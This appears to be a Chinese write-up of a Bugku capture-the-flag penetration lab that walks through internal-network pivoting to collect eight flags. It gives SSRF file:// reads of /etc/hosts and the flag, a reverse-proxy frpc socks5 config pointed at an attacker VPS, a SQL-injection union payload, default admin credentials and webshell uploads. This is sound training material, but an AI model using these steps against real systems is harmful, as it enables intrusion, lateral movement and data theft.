bugku 渗透靶场3

前言

本题一共八个flag,主要是为了练习内网渗透的思路。

解题思路

首先给了一个站长之家-模拟蜘蛛爬取,这个以前见到过,存在sstf漏洞,直接读取文件。

file:///flag

bugku 渗透靶场3_第1张图片

既然是要内网渗透,那肯定要看/etc/hosts。

file:///etc/hosts

bugku 渗透靶场3_第2张图片

爆破192.168.0.2端口,发现存在192.168.0.10,是一个被黑的页面。

bugku 渗透靶场3_第3张图片

尝试访问shell文件,发现shell.php可命令执行。

bugku 渗透靶场3_第4张图片

想传入一句话木马连接蚁剑,首先需要内网穿透开启代理,利用wget将所需要的文件下载上去。

bugku 渗透靶场3_第5张图片

然后启动frpc服务,需要先在vps上启动frps,代理连接后即可传入一句话木马来连接蚁剑。

命令:
vps ./frps -c frps.ini (先运行)
靶机 ./frpc -c frpc.ini

frpc.ini配置文内容

[common]
server_addr = vps
server_port = 7000

[socks5]
type = tcp 
remote_port = 7001
plugin = socks5

bugku 渗透靶场3_第6张图片

bugku 渗透靶场3_第7张图片

在html下和根目录下各有一个flag。

然后上传fscan扫描10.10.0.0/24和192.168.0.0/24。

192.168.0.138为分数查询系统,存在sql注入。

4 union select 1,2,3,(select+*+from+flag)#

在192.168.0.250中存在登录框,登录成功后并无回显,最后xxe尝试成功,在html下和根目录下各有两个flag。

bugku 渗透靶场3_第8张图片

又在10.10.0.22中发现bugku管理页面,存在admin.php后台。

admin admin登陆成功。

发现有文件上传功能且没有过滤,可直接传入一句话木马,在html目录和根目录下各有两个flag。

bugku 渗透靶场3_第9张图片
因为环境已经到时,不想再用20金币开启,所以后边写的较简略。

你可能感兴趣的:(网络安全)